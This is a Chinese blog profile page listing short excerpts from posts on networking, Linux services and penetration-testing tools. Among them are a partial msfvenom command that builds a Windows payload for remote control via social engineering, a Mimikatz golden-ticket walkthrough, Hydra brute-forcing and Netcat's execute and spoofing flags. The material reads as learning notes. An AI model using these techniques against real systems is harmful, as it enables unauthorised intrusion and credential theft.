自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(35)
  • 收藏
  • 关注

原创 wmic的历史传奇(对Windows的管理)(高版本的替代品)

下面是分析:首先是用的wmic,因为wmic不能直接创建计划任务所以我们记住计划进程来创建计划任务,首先”cmd /c”是指以cmd来输入后面的命令/c 是防止因为命令响应太久从而系统假死的终止命令,后面schtasks是cmd指令里的计划任务指令后面是他的参数。借助C++等编译语言的软件,但之后用wmic更方便,之后淘汰了在powershell强大的NET的服务上将wmic的功能给添加给了powershell,这样也是Microsoft对linux的shell的一次挑战。

2023-11-27 18:43:25 1372

原创 七层模型 网络功能和协议(通俗易懂一遍就会)

数据链路层使用一些技术,如校验和和重发机制,来检测和纠正这些错误,以确保数据的可靠传输。所以你需要将包裹分割成更小的包裹,每个包裹都有自己的标签和编号,以确保它们能够按照正确的顺序重新组装在一起。它将从物理层接收到的数据分割成一系列较小的帧,每个帧都有自己的控制信息,比如起始标记和终止标记。总的来说,网络层就像是计算机网络中的导航系统,它负责标记和寻址数据包,并决定它们的最佳路径,确保数据能够顺利到达目的地。物理层还负责处理一些基本的传输问题,比如信号的强度、噪音的干扰以及数据的时序问题。

2023-10-04 21:11:54 74 1

原创 【Nginx】的认识和基础配置

Nginx是一个web服务器的名字,他可以类比apache2服务器,但其不同的是他利用的是反向代理,更安全,有在内存分配上将总的平均分配给各个服务器,这样可以防止因单个服务器过载导致出现内存瓶颈,以至于是得服务器响应变慢。他的web服务文件在conf.d中也就是其他服务都有的子配置文件,他一开始是空的要自己创建一个XXX.conf。但他的主文件和apache2主配置文件不同的他的主文件是用来设置对于这个服务的限制和相关的参数的。Location 是这个配置文件的主要内容。下面是对于他的配置文件的基本介绍。

2024-01-12 20:52:21 399

原创 APACHE2的ssl配置

Openssl req -x509 -nodes -days 365 -newkey rsa:2048 -keyout /你自己的密钥保存点/ -out /你自己的配置保存点/ssl 是一个由csr通过CA颁发的数字证书来进行加密访问的http服务中的协议又称https。SSLCertificateFile /你自己刚刚的配置保存点/只是在原来的虚拟主机配置中加入了ssl的key文件和crt文件。首先要想配置ssl那么必须要有ssl的配置证书。在到想要ssl加密的虚拟主机中加入下面的参数。

2024-01-10 19:27:52 524

原创 apache2的虚拟主机的配置

注意在配置时看着error.log 会更有效率,这个时apache2的错误日志,所以在发生错误时可以去看在结合自己的实际情况进行相应的更改。然后用ln -s 指令创建符号链接于enabled这也就是告诉服务器的主配置,这些有符号链接的配置文件是可以启用的web虚拟主机。2.同ip端口法:可以依靠当前ip下的开放的闲置端口进行相应的配置,从而达到访问当前主机但是依照端口进行相应的访问。DocumentRoot /var/www/XXX/(这里是你的服务器要展现的东西的目录)

2024-01-09 21:04:22 941

原创 【APACHE】的认识和基础配置参数

他将apache2 的配置文件分成不同板块的,有专门配置端口的ports.conf有关于apache2上穿的文件类型的识别的magic,还有对于apache2的配置的环境变量文件envvars,还有许多的加载模块和配置模块存放在mods-available中,还有一个自带的虚拟机启动目录。这两个都是对于linux系统的服务,对于高版本的系统来说他们的apache2是服务名,如果要安装是安装apache2 但在低版本中叫做httpd,但在安装好后可以看到,这两个其实是同一个web服务。

2024-01-07 16:15:19 851

原创 python的初识(print+intput函数和变量的基本运用)

这样就相当于将一个随便名字的变量给赋予了JNDJ 的值,那么当print或者其他函数使用这个变量名时系统便会将其识别为JNDJ。首先要想编译一个程序那么就要用到一个相对应的编译器,一般常用的编译器有VS code dev CPP(++)。他作为在计算机编程领域中的高级语言领域算是较为容易的一门语言,他的大部分功能包含,爬取网站等。他也是初学者们接触的第一个函数。他的作用不止有单独打出规定的字母和汉字,其他的功能将在实际用到时提供讲解。Python 的历史和其相关的基本工作 python的起步命令掌握。

2024-01-04 18:53:57 433

原创 samba的基础运用和配置

Samba的配置,samba的基本运用,samba和其他同类型的服务的区别,samba对于安全和他的优点。只是你一方面在意别人的目光,另一方面却不清楚自己的方向在哪里。然后要给这个共享文件夹的属组和属主给改成你设置的用户这里是JN。create mask =0777 访问的用户创建文件的预设值。valid users = JN 允许访问的用户。是NASA发明的一个强制控制访问的防护墙。后就可以很好的控制smb的共享文件夹了。public =yes 公共访问的权限。优点,可以更好的提供访问的领域。

2024-01-01 09:49:20 609

原创 NFS的基本使用

目标文件JN的创建(注意和个JN只是个名字并没有特殊的含义,只要在配置文件中有你要共享的文件目录的路径就可以了)他约等于windows 中的IPC$共享文件夹,可以使客户端很好的拿到服务端的共享资源。注意:如果你挂载到一个内涵很多文件的父目录中那么其他的文件将被服务器共享的文件顶替掉。NFS是存在于linux 中的存储共享服务,是基于TCP/IP中的传输网络的协议。下面将讨论什么是NFS,如何配置NFS,NFS和他的同类服务的区别,NFS的优点。)中的是代表了他共享时,客户端所拥有的权限。

2023-12-31 11:40:16 478

原创 FTP的基本介绍

如果要访问ftp那么在windows 的文件文件管理器路径搜索条目里输入ftp://你刚刚指定的ip(如果你刚刚没指定分配ip那么他默认为本机ip)如何使用iis.msc打开ftp,如何使用cmd打开ftp ,如何匿名登录ftp,ftp和共享文件夹的区别,ftp的优缺点是本章讨论的主要中心。ftp是一个可以提供共享文件的服务器,他可以通过iis.msc也就是windows 的服务器管理器来打开,或者通过cmd命令行打开。3.高度的管理性,在iis管理器中可以更好的管理你的windows 的ftp。

2023-12-30 19:28:26 595 1

原创 PAM的认证机制

下面是例举他的参数retry=X (密码的尝试次数) minlen=2(密码的长度设置)urredit=X 至少有X个大写字母 dcredit=X 至多有X个数字 oredit= X 至少有X个特殊字符 difok=X 新密码至少有X个字符和旧密码不同。里面有ssh、samba、还有对于系统的密码的设置,其中大部分的认证都会对一个名为system-auth的文件他的配置主要是针对于密码的认证策略,就像windows 中的主策略一样,他可以控制密码的字符的重复数,控制密码的长度,控制密码的强度等。

2023-12-30 19:19:29 457

原创 MSFVENOM的使用

Lhost=XXX.XXX.XXX.XXX lport=5555 -f exe > (指定一个文件名且后缀为exe的)test.exe。是一个自定义的载荷系统,他是基于msf框架下的附属软件,例如他可以将载荷制成exe文件,然后经过对目标的输出或者社会工程,来对目标进行控制。接着我们用apache2来创建一个网站,然后用这个网站达到让目标获得文件的效果。出现这个就表明正在监听,然后让目标打开并使用test.exe文件。那么如何让目标获得这个文件呢?上面的这些值是你预先在exe文件中设置好的。

2023-12-25 09:45:33 555

原创 tcp 的限制 (TCP_WRAPPERS)

TCP_WRAPPERsTcp_wrappers 对于七层模型中是位于第四层的安全工具,他的作用是用来控制访问列表,也就是限制访问,例如你用什么tcp相应的协议的服务,他就可以控制访问。虽然他的作用和防火墙很像,但不同点在于,他只限制tcp协议有关的服务的访问。例如ssh telnet vsftpd等。下面是他的工作原理:文字叙述:首先我们得了解tcp在进行三次握手后,会对主机进行什么样的操作,首先主机利用ssh服务我们来进行讨论,在主机被连接时,他会相应的扫描对应于ssh 服务的动态链接库,其中一个为li

2023-12-21 16:43:23 701

原创 telnet的交互原理(wireshark分析)

下面是他的信息交互,服务端首先向客户端发送一个登录的验证请求,当客户端输入时服务端会记录,(这里也是telnet的缺点,原因放在下文)当验证通过,则同意使用telnet 目标的shell命令行。因为telnet 他密码是明文的,在交互时可以查看到他的交互密钥和登录,并且用wireshark可以明显的看出服务端和客户端之间的交互内容如图。telnet的协议类型是tcp,他的密钥用的是明文的,容易被捕获,所以后来的windows基本弃用了telnet服务端但依然保留了客户端。

2023-12-19 18:23:41 1035

原创 SSH的交互原理(wireshark的分析)

第一条是我们的连接机客户端对其发送请求可以看到后面是windows(这有个坑就是为什么我真机的ip不在里面,其实192.168.176.1就是你的真机这是vmware的特性并且是nat模式所以这就是你的真机,部分人可能因为用筛选栏找不到真机的ip 而错过认为这不是真正的抓取到。第二条和第一条差不多,可以看到只是soure和destination的IP替换了,还有的是后面的ssh服务的版本改成了debine 的ssh是我这台kali 用的ssh 的服务版本。SSH的交换原理(wireshark篇)

2023-12-19 17:31:33 889

原创 WIRESHARK的介绍和基本运用(分析)

历史摘录:GeraldCombs当时需要一个能够追踪网路的工具,因此他开始撰写wireshark 的前身(Ethereal)在时间的发酵下,很快这款软件就风靡网路安全领域,不久他就创办了自己的团队,并把Ethereal改为wireshark,这就有了如今的wireshark。wireshark是一款抓包软件,他是与本地网卡直连的,所以可以有效的高速的捕获到网络流量的流动。分析:用于分析和显示你的选择,如显示过滤器的配置,和解码分析与数据的特定流等等。文件:文件的操作,例如开放和保存的文件、出口包、导出等。

2023-12-18 19:34:17 670

原创 Mimikatz 的使用(黄金票据的制作)

在他的工作范围内,他可以获取当前windows 的密码哈希值或者sid 和等来合成黄金票据的所需材料,这使我们的电脑十分危险,如果让我们的电脑遭受了他的攻击那么我们的会遭受到信息泄露,或者被注入病毒等一系列问题。孤独没有什么反义词,但他的近义词是自由,人生成功的道路上充满了孤独,那么也同样告诉你,你离成功后的自由不远了。黄金票据,打个比方,在生活中有一种非常牛的卡,一般存在于富豪手中,有了他,那么你就可以无所不能。username hacker (冒充的用户)3测试用的用户名(虚构的,或者用来冒充的)

2023-12-18 15:55:37 627

原创 hping3

b --badcksum 尝试发送不正确IP校验和的数据包(许多系统在发送数据包时使用固定的IP校验和,因此你会得到不正确的UDP/TCP校验和.)--force-icmp 发送使用icmp数据包了下 –icmp-gw针对icmp时间包重定向设置网关地址。--icmp-ts 相当于—icmp –icmptype 13 (icmp的时间戳)-u --end 当通过- -file指定的文件结束时停止并显示,防止文件再从头开始。-o –tos 针对服务类型,默认0x00 ,--tos help查看。

2023-12-17 19:52:19 623 1

原创 渗透实验基础教程(完整版):

江南的江#每日鸡汤:影响我们人生的绝不仅仅是环境,其实是心态在控制个人的行动和思想。同时,心态也决定了一个人的视野事业和成就,甚至一生。#初心和目标:成为网络安全达人。。。

2023-12-16 09:39:30 1423 1

原创 HYDRA爆破之王(服务多)(用法简单)

AFP,Cisco AAA,Cisco身份验证,Cisco启用,CVS,Firebird,破,其中的在线爆破,就是让hydra不断的向服务器发送验证请求,来达到爆破目的。他的特点是支持大部分的协议,他并且是直接向服务发送在线攻击,也可以对目标单个攻击。是一款强大的密码爆破软件,他的密码爆破方式大体分为两种,离线爆破,和在线爆。环境:“在我朋友的努力下,我们通过社工,为他配置了密码字典”(假设)指定破解的目标IP文件,如果不是默认端口,后面跟上“:port”,SMTP,SMTP枚举,SNMP,SOCKS5,

2023-12-16 08:40:33 1314 1

原创 Linux 下的PROC虚拟文件夹的介绍

这样一行数字,代表的是子第八号设备中的第一序列,有个叫sda 的设备他的请求次数是56447 而成功的次数是22743 在2128766的总扇区花了14178的时间成功了29815,请求合并的次数是20323此时间。是当有些硬件设备需要处理器来处理任务或者工作时,就会向CPU发送IRQ,为什么是中断数呢,是因为在CPU接收到了设备发来的IRQ,CPU会暂时停下手头的工作先去处理发送IRQ中断数的设备,等结束后再运行刚刚的任务。单个CPU的标号,物理CPU的唯一标识符,物理CPU就是硬件上真实存在的CPU。

2023-12-15 19:13:41 1241

原创 日志的介绍和远程连接

同理计算机中也依靠日志:对于网络安全日志是不可或缺的存在之一,同样日志对于攻击者入侵者来说是危险的存在,他会记录下他的罪行和行为,这对他很不利,所以一般的黑客骇客在攻击或者渗透目标后通常会清除日志(这也是他们离开前最重要的事),虽然日志可能会被清除但在普通的管理中还是有很多用处的在Linux 中的日志主要在/var/log/中是分开装的各个log文件有自己的管理方面例如sercure 是实时记录用户的登录和登出的他里面记录了用户的登录时间,他通常会有自带的一个备份。人的一生,没有一味的苦,没有永远的痛;

2023-12-14 16:21:06 1002 1

原创 Netcat强大的网络工具

v 端口信息 -vv 更详细的端口信息 -e 执行程序 -n 只识别ip不解析DNS。Netcat是相较于Nmap下的很实用的网络软件在大部分系统中以nc简称(后文都以nc为代表)-l 设置监听端口 -L 设置nc处于待连接,并且在服务端断开依然等待 -p 本地的端口号。-s :addr 设置nc 的源地址,隐藏自己 (就是编造我的ip告诉目标电脑达到欺骗的效果)如果你希望成功,以恒心为良友,以经验为参谋,以小心为兄弟,以希望为哨兵。基本的线上聊天:这里端口以8888为例子。

2023-12-12 21:06:20 371 1

原创 哈希的破解

加盐,其实就像他的名字一样,对我要加强哈希的数据在其中添加一些随机的不相干的数值,在添加先存放这些数值到专门的地方,再对加过料的数据完整的进行哈希算法,这样既加强了数据的强度,又不会因记不得盐值而无法获取数据还大大提升了破解的难度。那么为什么要有hash,在计算机应用中哈希值的用途非常的广他就像人们的指纹,赋予给计算机数据的一个特殊的定义,那么人们为了方便就创建了hash表, hash表又叫。在hash的运用中输入数据的长度是不固定的,输出的哈希值是固定的,那么就不能保证一对一的哈希值,那么就会发生碰撞。

2023-12-12 16:50:40 1974

原创 NMAP 的基本使用(和介绍)

Nmap 的基本命令介绍

2023-12-05 18:38:15 478

原创 KALI的好工具MSFCONSOLE

在其中包含了许多的历史漏洞(Nday),各种复杂的工具,和扫描的工具,当然他不仅是让hacker们使用的还是可以让各位安全人员使用的,俗话说的好:“最好的进攻是防守。这个是密码爆破的字典地址 /1 (1是我的字典,可以自己实际使用)(密码爆破的字典是自己设置的)02:用一台windows7 *除了自带的一个安装补丁其他的尽量暂时卸载,不然可能影响实验*是kali linux 中自带的框架,是普通hacker们常用的渗透工具。其中的192.168.227.5就是我们的靶机,正好检验ip的真实性。

2023-12-03 19:23:36 772 1

原创 AI 话题讨论

利益:在对于一些繁琐的工作什么的可以全权交给AI来接管,只需要程序员编写对应的程序即可,在信息搜集方面基本上在普及后可以代替浏览器的搜索功能(并不是所有功能),他的网络资源库十分的庞大,所以知道的也多所以这就相当于一个满腹经纶的大师在和你一对一的辅导。弊端:对于AI他的工作会一5s工作法,将一些在5s中能处理的事替换成AI,这会导致AI将代替大部分重复工作流程的工作。人工智能在医疗,制造,军事,生活,网络都有他们的身影,当然对于我们玩计算机的就一定知道chatgpt这个智能AI。

2023-12-01 20:27:03 439 1

原创 Shopt的行为和用法

纠正cd命令中目录名的较小拼写错误.检查的错误包括颠倒顺序的字符,遗漏的字符以及重复的字符.如果找到一处需修改之处,正确的路径将打印出,命令将继续.只用于交互式shell。:如果一个非交互式shell不能执行指定给exec内置命令作为参数的文件,它不会退出.如果exec失败,一个交互式shell不会退出。:bash在试图执行一个命令前,先在哈希表中寻找,以确定命令是否存在.如果命令不存在,就执行正常的路径搜索。:如果给cd内置命令的参数不是一个目录,就假设它是一个变量名,变量的值是将要转换到的目录。

2023-12-01 15:28:49 401 1

原创 远程连接的安全

2.Linux 在linux中在/var/log中有个secure,这个里面存放着ssh和telnet的登录详细时间和详细信息。RDP远程桌面服务,作为一个Windows唯一自带的图形化的远程连接,他的端口就是3389.同时按Win+R键在运行的命令行中输入eventvwr.msc。那么怎么看日志,默认的登录日志存放在Windows日志>安全。不同的是telnet的服务是在一个守护进程中的。对于网络安全来讲日志的查看是非常重要的。2.在ping通的情况下看看是否开启服务。然后在查找中输入事件的ID。

2023-12-01 14:55:36 477 1

原创 对称加密和非对称加密

在介绍了对称加密,对称加密在现实中也存在缺点,:“一般情况下,只要你的密码设置的足够复杂,那么绝不会有安全问题,但对于网络服务器加密的话,就会有一个典型的中间人密钥窃取,那么什么是中间人密钥窃取呢:‘在网络服务器和设备进行通信时在用户通过了密码后要互相交换密钥以互相确认因为他们的密钥是对称加密的所以使用的是同一个。’”那么非对称加密解决了这一点,在非对称加密中会生成两个密钥,一个是可以公开的密钥叫做公钥,不能公开的叫私钥,他们是成对出现的,(最好的例子是SSH的密钥通信)那么到底哪里安全了呢。

2023-11-29 17:33:33 399 1

原创 SSH的安全

这样,即使有人试图进行中间人攻击,他们也无法伪造服务器的公钥,因此你的。端口转发其实就是让请求机在中间交互机/设备/计算机的转发端口中直接访问,打个比方:“我是客户,如果我要买一个江南的特产,在没有快递的时代,是不是要自己去到那拿,但是现在有了快递站,只需要他去采购到在通过转运站转发给我就可以了”想必玩linux的大家们都知道这个ssh远程连接,首先ssh作为telnet的替代品,有着比telnet高的安全性。免密登录也是ssh的一大特点只要你有对方的密钥就可以顺利的登录进去,当然记住不要泄露了密钥。

2023-11-27 21:34:59 418

原创 RDP(远程桌面)讲解(安全加固)(缺点)

就可以远程连接上了,这不比什么SSH,Wmic,telnet好用,的确对于普通用户来讲是没错,但对于企业的服务器,常常使用的是linux/UNIX的操作系统,那就不能进行连接了,除非用rdesktop等第三方软件。1)rdp(远程桌面)顾名思义远程桌面,就是图形化,但计算机要图形化就会有帧率的产生,那么第一个缺点就暴露出来了,帧率常常不过10几,也就是会出现太过卡顿,常常出现鼠标动了屏幕一动不动的情况。是为什么呢,那么具体怎么维护rdp能达到普通用户就可以实施的基本的防护,首先要从他的缺点来下受。

2023-11-27 20:28:15 967

原创 SSH的免密登录

例子:scp C:\Users\student-03/.ssh/id_rsa.pub。首先要双方设备皆可使用ssh客户端和都能有ssh 的服务端。看看配置文件中有没有这三行字。4,最后一步重启sshd服务。理解公钥和私钥的作用。

2023-11-27 19:36:41 389

原创 计算机硬件系统:

输入:键盘、鼠标、麦克风、等是可以让外界对电脑进行更改或互动的设备叫做输入设备。输入:键盘、鼠标、麦克风、等是可以让外界对电脑进行更改或互动的设备叫做输入设备。计算机的存储器又分为内部存储器(内存/主存)、CPU缓存、外部存储器(外存)。:是由CPU、内存、主板、机箱、散热系统、声卡、网卡等组成。:是由CPU、内存、主板、机箱、散热系统、声卡、网卡等组成。各种算术例如:与、或、非、异或、和基本的四则运算。各种算术例如:与、或、非、异或、和基本的四则运算。计算机工程师:是以导线、电源、等组成的物理接口。

2023-10-16 19:54:33 42 1

原创 MAC地址(通俗易懂 一遍秒懂)

每台计算机和网络设备都有一个独特的MAC地址,就像是每个人都有一个唯一的名字一样。所以,MAC地址就像是计算机网络中设备的身份证号码,用于唯一标识每台设备。当你发送一个数据包时,它会被标上你的MAC地址作为发送者,接收者的MAC地址则是目标设备的地址。它被永久地嵌入到设备的网络接口卡中,就像是人的名字在出生时就确定下来一样。MAC地址就像是计算机网络中设备的名字,它是一个唯一的标识符。这样,网络设备就可以根据MAC地址将数据包正确地传送到目标设备,就像是朋友根据你的名字找到你一样。

2023-10-04 20:45:05 3267 2

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除